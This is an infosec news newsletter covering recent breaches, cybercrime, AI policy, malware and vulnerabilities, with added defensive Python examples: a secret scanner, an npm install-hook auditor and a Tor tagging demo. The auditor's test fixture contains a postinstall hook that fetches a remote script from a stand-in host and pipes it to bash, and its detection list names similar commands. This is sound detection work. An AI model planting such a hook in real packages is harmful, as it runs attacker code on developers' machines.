🕵🏻♂️ [InfoSec MASHUP] 48/2025
OpenAI says some user data was exposed in a Mixpanel breach; Gainsight says more customers were affected by suspicious activity tied to its Salesforce apps; the House Homeland Security Committee asked Anthropic CEO Dario Amodei to testify about a likely Chinese espionage campaign; the self-replicating worm called Shai-Hulud is back; the French Football Federation was hit by a cyberattack and member data was stolen.
We now have 1,613 active subscribers! Thank you all for being part of my newsletter. Please share it with your friends and colleagues, and let’s keep growing the community.
Let’s now dive into this week’s top insights! 🚀
🎙️ Oh, and just for fun, NotebookLM narrated last week’s issue - Worth a listen 🙂
🔓 BREACHES & SECURITY INCIDENTS
🇯🇵 Canon says a recent Oracle E-Business Suite hack only hit a subsidiary’s web server. No Canon data has been leaked and services have been restored. The wider Cl0p/FIN11 campaign has named over 100 alleged victims across many industries.
🇫🇷 ⚽️ The French Football Federation said a cyberattack stole member data from its club management software. The breach used a compromised account and was stopped after detection; passwords were reset. The stolen data were personal details (names, gender, nationality, addresses) and the federation has filed a complaint.
🇯🇵 🍺 Japanese beer maker Asahi, which suffered a ransomware attack in late September that exposed personal data of about 2 million people, is restoring systems in phases, investigating the breach, and warns that recovery may take months. Stolen records include names, addresses, phone numbers, emails, birthdates, and gender for customers, employees, and family members, but no credit card data.
🤖 OpenAI says some user data was exposed in a Mixpanel breach that Mixpanel detected on November 8. The leaked dataset included names, emails, approximate location, browser/OS, and organization or user IDs, but not ChatGPT content, passwords, API keys, payment data, or government IDs. OpenAI removed Mixpanel from production, is notifying affected users, and warns the data could be used for phishing.
🔑 Users of online code-formatting sites like JSONFormatter and CodeBeautify have exposed thousands of secrets, including keys, tokens, credentials, and PII. WatchTowr found these leaks by scraping saved JSON files and says attackers quickly harvest and use the exposed data. Many leaks come from people saving shareable links or pasting sensitive info into tools without sanitizing it.
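The practical lesson from the formatter leaks is to scan a document for credentials before it ever goes into a shareable link. The following is an added example, not watchTowr's tooling: it walks a JSON document, matches a few well-known token shapes (AWS access key IDs, GitHub and Slack tokens, PEM private-key headers, JWTs; an illustrative set, not a complete rule base) and falls back to a Shannon-entropy check for long random-looking values under key names such as `password`, `secret`, `token` or `api_key`. The sample document and every value in it are constructed and fake.

```python
import json
import math
import re
from collections import Counter

# Credential shapes to look for. Assumption: these prefixes are illustrative,
# not an exhaustive rule set (AWS access key IDs, GitHub tokens, Slack tokens,
# PEM private-key headers, JWTs).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{20,}\b"),
    "slack_token": re.compile(r"\bxox[abpr]-[A-Za-z0-9-]{10,}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b"),
}
# Key names under which an opaque high-entropy value is almost certainly a secret.
SENSITIVE_KEYS = re.compile(r"(pass(word)?|secret|token|api[_-]?key|private)", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character: ~4 for random hex, ~5 for random base62, ~3 for prose."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def _walk(node, path):
    """Yield (dotted.json.path, string_value) for every string in the document."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _walk(v, path + [str(k)])
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _walk(v, path + [str(i)])
    elif isinstance(node, str):
        yield ".".join(path), node


def find_secrets(doc: str, entropy_threshold: float = 4.0, min_len: int = 20):
    """Return a list of (json_path, reason) for values that look like credentials."""
    findings = []
    for path, value in _walk(json.loads(doc), []):
        reasons = [name for name, rx in PATTERNS.items() if rx.search(value)]
        key = path.rsplit(".", 1)[-1]
        # No known prefix matched, but the key name says "secret" and the value
        # is long and random-looking: report it as a probable credential.
        if (not reasons and SENSITIVE_KEYS.search(key)
                and len(value) >= min_len
                and shannon_entropy(value) >= entropy_threshold):
            reasons.append("high_entropy_under_sensitive_key")
        findings.extend((path, r) for r in reasons)
    return findings


# Constructed sample: a config someone might paste into a formatter. All values are fake.
SAMPLE = json.dumps({
    "service": "billing",
    "aws": {"access_key_id": "AKIAIOSFODNN7EXAMPLE", "region": "eu-west-1"},
    "github": {"token": "ghp_0123456789abcdefghijklmnopqrstuvwxyz"},
    "db": {"api_key": "Zq8vL2nX7pR4tY9wK3mB6sH1dF5gJ0cA", "host": "db.internal"},
    "notes": "harmless text",
})

if __name__ == "__main__":
    for path, reason in find_secrets(SAMPLE):
        print(f"{path}: {reason}")
```

The entropy fallback deliberately does not fire on low-entropy passphrases, so a value like `"password": "correct horse battery staple"` passes; if that matters for your data, flag any non-empty value under a sensitive key instead and accept the extra noise. The real fix is organisational: keep formatters and beautifiers local (an editor plugin or a CLI such as `jq`) so nothing leaves the machine.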
📄 Gainsight says more customers were affected by suspicious activity tied to its Salesforce apps than first reported, though only a few had data exposed. Salesforce revoked affected app access and several vendors paused Gainsight integrations while investigations continue. The breach is linked to the ShinyHunters group and follows broader activity from a new RaaS called ShinySp1d3r.
🇺🇸 💰️ Comcast will pay a $1.5 million FCC fine after a vendor breach exposed about 274,000 customers' personal data. The breach occurred in February 2024 at debt collector FBCS, which notified Comcast months later; the FBCS incident affected millions of people across its clients overall. Comcast must improve vendor oversight, appoint a compliance officer, and file regular FCC reports, though it denies wrongdoing.
🇺🇸 🚨 Risk management firm Crisis24 said its OnSolve CodeRED emergency alert platform was hit by a cyberattack that disrupted alerts nationwide. The attackers stole user data, including names, addresses, emails, phone numbers, and clear-text passwords. The ransomware group INC Ransom claims responsibility and Crisis24 is rebuilding the system from an earlier backup.

Figure: OnSolve entry on the INC Ransom data leak site/BleepingComputer
🇺🇸 Hackers breached SitusAMC, a financial tech firm, on November 12 and stole corporate data, accounting records, and legal agreements. Major banks and lenders are hurriedly checking whether their customers’ information was exposed. The FBI is investigating while SitusAMC says the incident is contained and its systems are operational.
🇪🇸 ✈️ Spanish airline Iberia says a supplier was hacked and customers' names, emails, and frequent flyer numbers were stolen. No passwords or full credit card data were exposed, and Iberia added email-change verification and notified law enforcement. A hacker claimed to have about 77 GB of Iberia data and tried to sell it for $150,000.
🇺🇸 Harvard reported a voice-phishing attack that accessed Alumni Affairs and Development systems. Personal contact and donor-related information for alumni, donors, some students, faculty, and staff may have been exposed. The university says no Social Security numbers, passwords, or payment data were in the compromised systems and is investigating with law enforcement and experts.
🔗 Partners and Affiliates
🔐 NordVPN Cyber-Monday Plan (Dec 1 - Dec 10)
With its user-friendly interface, robust security features, and commitment to privacy, NordVPN continues to be a popular choice for individuals seeking online protection and unrestricted internet access.
Special Offer: get up to 73% off with a 2-year plan!
🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APT’s
🤝 Meet Rey — The cybercriminal group called Scattered LAPSUS$ Hunters (SLSH) has been stealing data and extorting major companies. The group’s technical operator and public face, “Rey”, was identified as 15-year-old Saif Al-Din Khader from Amman after security researchers traced operational mistakes. Saif says he is cooperating with law enforcement and wants to leave the group.
🇷🇺 🇺🇸 🇺🇦 The Russia-linked threat actor RomCom attacked a U.S. engineering firm because it worked with a U.S. city that is a sister city of a community in Ukraine. Cybersecurity firm Arctic Wolf said the attackers target organizations with ties to Ukraine. The campaign shows Russia-aligned hackers are willing to hit private companies that support Ukrainian institutions.
🇺🇸 The FBI warns that cybercriminals posing as bank or support staff have stolen over $262 million in account takeover scams since January 2025. Attackers use phishing and impersonation to steal login credentials, then move funds to crypto wallets and lock out victims. The FBI urges strong passwords, MFA, caution with links, and reporting incidents to banks and ic3.gov.
🗓️ {Cyber,Info}Sec Events: My list of past and future {cyber,info}sec related events — Feel free to contribute by submitting issues or pull requests (and don’t forget to star the project); Thanks! 😉
👨🏻⚖️ 👀 GOVERNMENT, POLITICS, AND PRIVACY
🇺🇸 👀 🇨🇳 The House Homeland Security Committee asked Anthropic CEO Dario Amodei to testify about a likely Chinese espionage campaign that used Anthropic's Claude model to target at least 30 organizations. Lawmakers called the incident a major national security concern and invited CEOs from Google Cloud and Quantum Xchange to the Dec. 17 hearing. They want to examine how AI, quantum tech, and cloud infrastructure enable new state-sponsored cyber threats and defenses.
🔗 Partners and Affiliates

🌐 Stay connected and secure on the go with Airalo's global eSIMs — Use the code NEWTOAIRALO15 if you’re new to Airalo to get an additional 15% discount.
🦠 MALWARE & THREATS
🪱 The self-replicating worm called Shai-Hulud has been injected into nearly 500 npm packages, exposing developer secrets across more than 26,000 GitHub repositories. The new variant is far more automated, using stolen npm tokens to rapidly spread and create public repos with stolen data. Security teams warn this boosts the risk of downstream supply-chain attacks and wider exploitation.
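A worm that spreads through npm has to execute at install time, so the first triage step on a project is to enumerate every package in the dependency tree that declares an install-time lifecycle hook and look at what the hook runs. The script below is an added example, not part of the Shai-Hulud reporting or any vendor's tool: it walks `node_modules` (nested trees included), lists `preinstall`/`install`/`postinstall`/`prepare` scripts, and applies a small substring heuristic for hooks that download or eval code. The package names and manifests in the fixture are made up, and the heuristic substrings are a starting point, not a detection signature.

```python
import json
import os
import tempfile

# npm runs these hooks automatically during `npm install` unless
# --ignore-scripts is set; install-time malware lives in one of them.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")


def find_install_scripts(root: str):
    """Yield (name, version, hook, command) for every package under
    root/node_modules, nested trees included, that declares an install hook."""
    for dirpath, _dirnames, filenames in os.walk(os.path.join(root, "node_modules")):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, don't crash the audit
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE:
            if hook in scripts:
                yield pkg.get("name", dirpath), pkg.get("version", "?"), hook, scripts[hook]


def suspicious(command: str) -> bool:
    """Heuristic: an install hook that downloads or evals code deserves a look.
    Assumption: these substrings are a starting point, not a complete signature."""
    needles = ("curl ", "wget ", "node -e", "eval(", "bash -c", "| sh", "| bash",
               "powershell", "http://", "https://", "child_process")
    return any(n in command for n in needles)


def audit(root: str):
    """Return one dict per install hook found, with a 'flag' for suspicious commands."""
    return [
        {"name": n, "version": v, "hook": h, "command": c, "flag": suspicious(c)}
        for n, v, h, c in find_install_scripts(root)
    ]


def build_sample_tree() -> str:
    """Constructed fixture: a throwaway project with three made-up packages
    (one with no scripts, one legitimate native build, one nested dependency
    whose postinstall fetches and runs a remote script)."""
    root = tempfile.mkdtemp(prefix="npm-audit-")

    def write(pkg_dir, manifest):
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)

    nm = os.path.join(root, "node_modules")
    write(os.path.join(nm, "left-pad-ish"),
          {"name": "left-pad-ish", "version": "1.0.0"})
    write(os.path.join(nm, "native-thing"),
          {"name": "native-thing", "version": "2.3.1",
           "scripts": {"install": "node-gyp rebuild"}})
    write(os.path.join(nm, "native-thing", "node_modules", "evil-dep"),
          {"name": "evil-dep", "version": "0.0.9",
           "scripts": {"postinstall":
                       "node -e \"require('child_process').execSync('curl -s https://example.invalid/x.sh | bash')\""}})
    return root


if __name__ == "__main__":
    for entry in audit(build_sample_tree()):
        marker = "!!" if entry["flag"] else "  "
        print(f"{marker} {entry['name']}@{entry['version']} {entry['hook']}: {entry['command']}")
```

Two controls go with this audit: install with `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) so no hook runs until you have reviewed it, and, since the worm spreads with stolen publish tokens, revoke long-lived npm tokens and require 2FA for publishing so a harvested token cannot push a new version on its own.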
🔙 🚪 Attackers have been exploiting a recent WSUS vulnerability (CVE-2025-59287) to gain system-level access. They used PowerShell tools and Windows utilities to download and install the ShadowPad backdoor. ShadowPad then runs via DLL side-loading and loads plugins for persistence and stealth.
🤖 🧰 AI, CRYPTO, TECH & TOOLS
🧅 🛠️ Tor replaced its old tor1 relay encryption with a new Counter Galois Onion (CGO) design to fix several security flaws. CGO adds strong authentication, per-cell key updates for forward secrecy, and protections against tagging attacks. The change is experimental now and will roll out automatically to Tor Browser users when ready.
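The three properties named above are easiest to see on a toy. The block below is an added example and is not Tor's tor1 or CGO construction; it uses a SHA-256 counter-mode keystream as a stand-in for AES-CTR and standard-library HMAC. Part 1 shows the tagging attack: a relay XORs a marker into an unauthenticated cell and the marker lands on the plaintext bit-for-bit, which is what lets a colluding relay at the other end of the circuit recognise the cell. Part 2 shows a per-cell authentication tag rejecting the tampered cell. Part 3 ratchets the key with a one-way hash after every cell, so a key captured later cannot decrypt earlier cells. The 509-byte payload size and the ratchet label are illustrative choices.

```python
import hashlib
import hmac
import os

MAC_LEN = 16  # truncated HMAC tag appended to each authenticated cell


def keystream(key: bytes, ctr: int, n: int) -> bytes:
    """Counter-mode keystream: SHA-256(key || cell counter || block index), concatenated.
    Stand-in for AES-CTR; the malleability shown below is a property of any
    XOR stream cipher, not of this hash."""
    out = b""
    i = 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(8, "big") + i.to_bytes(4, "big")).digest()
        i += 1
    return out[:n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- 1. Unauthenticated stream encryption: malleable ---
def enc_plain(key: bytes, ctr: int, cell: bytes) -> bytes:
    return xor(cell, keystream(key, ctr, len(cell)))


dec_plain = enc_plain  # XOR with the same keystream is its own inverse


def tag_cell(blob: bytes, tag: bytes) -> bytes:
    """What a malicious relay does in transit: XOR a marker into the first bytes."""
    return xor(blob, tag.ljust(len(blob), b"\x00"))


def demo_tagging(key: bytes, cell: bytes, tag: bytes) -> bytes:
    """Plaintext the next hop recovers after the cell was tagged on the wire.
    The tag lands on the plaintext bit-for-bit; nothing detects it."""
    return dec_plain(key, 0, tag_cell(enc_plain(key, 0, cell), tag))


# --- 2. Authenticated variant: tampering is detected before decryption ---
def _mac(key: bytes, ctr: int, ct: bytes) -> bytes:
    return hmac.new(key, ctr.to_bytes(8, "big") + ct, hashlib.sha256).digest()[:MAC_LEN]


def enc_auth(key: bytes, ctr: int, cell: bytes) -> bytes:
    ct = enc_plain(key, ctr, cell)
    return ct + _mac(key, ctr, ct)


def dec_auth(key: bytes, ctr: int, blob: bytes):
    ct, mac = blob[:-MAC_LEN], blob[-MAC_LEN:]
    if not hmac.compare_digest(mac, _mac(key, ctr, ct)):
        return None  # reject; a relay would tear the circuit down here
    return dec_plain(key, ctr, ct)


# --- 3. Per-cell key update: key_{n+1} = H(key_n), so an old key is unrecoverable ---
def ratchet(key: bytes) -> bytes:
    return hashlib.sha256(b"cell-ratchet" + key).digest()


def send_chain(key: bytes, cells):
    """Encrypt a sequence of cells, ratcheting the key after each one.
    Returns (ciphertexts, key_after_last_cell)."""
    out = []
    for i, cell in enumerate(cells):
        out.append(enc_auth(key, i, cell))
        key = ratchet(key)
    return out, key


if __name__ == "__main__":
    key = os.urandom(32)
    cell = b"GET / HTTP/1.1\r\n".ljust(509, b"\x00")  # 509-byte relay payload
    seen = demo_tagging(key, cell, b"\xff\xff\xff\xff")
    print("tagged plaintext prefix:", seen[:4], "rest intact:", seen[4:] == cell[4:])
    print("authenticated cell after tagging:",
          dec_auth(key, 0, tag_cell(enc_auth(key, 0, cell), b"\xff")))
```

Note that the ratchet alone does nothing against tagging; it buys forward secrecy. Only the per-cell authentication stops a tagged cell from propagating, which is why the two are separate items in the CGO description above.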
🇺🇸 🤖 A new bipartisan bill, the AI Fraud Deterrence Act, would raise fines and prison terms for fraud and impersonation using AI. Penalties could reach $1–2 million and 20–30 years for AI-assisted schemes, with up to $1 million and 3 years for impersonating officials. The bill responds to recent deepfake and AI-voice scams targeting officials and public figures.
🤑 Criminals are buying and sharing custom AI models on dark web forums to help with hacking tasks. These tools, like WormGPT and KawaiiGPT, make attacks easier by generating code, exploits, and phishing material. Experts warn this lowers the skill barrier and expands cybercrime.
🐛 🧠 VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE
🫂 Researchers found a Teams guest feature can let attackers bypass Microsoft Defender protections when users join external tenants. Attackers can create unprotected tenants or use low-cost licenses, send Microsoft-originated invites, and deliver phishing or malware without triggering home org defenses. Organizations should restrict B2B guest settings, use cross-tenant access controls, and train users to avoid unsolicited Teams invites.
🐛 🔓️ Five security flaws in the Fluent Bit log agent let attackers overwrite files, run code, spoof tags, corrupt logs, or bypass authentication. These bugs affect many cloud and container setups and could let attackers disrupt services or take over logging. Updating Fluent Bit to version 4.1.1 or 4.0.12+ fixes the issues.
🛰️ ICS, OT & IoT
🕸️ A new Mirai-based botnet called ShadowV2 targeted vulnerable D-Link, TP-Link, and other IoT devices using at least eight known flaws. Researchers saw the botnet active during the October AWS outage, likely as a brief test, and it spread globally to routers, NAS devices, and DVRs. ShadowV2 can run Mirai-style DDoS attacks, and vendors warn users to update or retire unsupported firmware.
💬 CONNECT
Follow me on Mastodon for quick daily updates and bite-sized content.
Prefer using an RSS feed? Add Infosec MASHUP to your feed here.
Enjoying our newsletter? Forward it to a colleague; it's one of the best ways to support us.
Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58
See you next time!
-X.
